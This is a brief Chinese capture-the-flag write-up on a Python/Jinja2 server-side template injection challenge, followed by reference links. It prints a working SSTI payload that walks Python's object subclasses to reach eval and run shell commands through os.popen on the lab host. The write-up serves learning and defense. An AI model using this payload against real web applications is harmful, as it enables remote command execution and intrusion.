攻防世界之Web_python_template_injection

之前做过一次python沙盒逃逸的题,但是当时只是看WP没有仔细地深入,这次仔细的探究一下这个漏洞的原理和防御。在这里只是写一点开端,后续再深入,因为我看资料发现这个漏洞牵扯到的东西挺多的。

题目

Web_python_template_injection

原理

python模块注入、python沙河逃逸

环境

firefox、hackbar

流程

在题目的URL后面添加如下命令,就可以命令执行了。

http://111.198.29.45:59109/{{().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("要执行的命令").read()' )}}

参考链接

https://www.cnblogs.com/wfzWebSecuity/p/9415641.html
Flask Jinja2开发中遇到的的服务端注入问题研究
服务端注入之Flask框架中服务端模板注入问题
Python 沙盒
python沙盒总结
从零学习flask模板注入
Flask/Jinja2 SSTI && python 沙箱逃逸

你可能感兴趣的:(ctf-Web)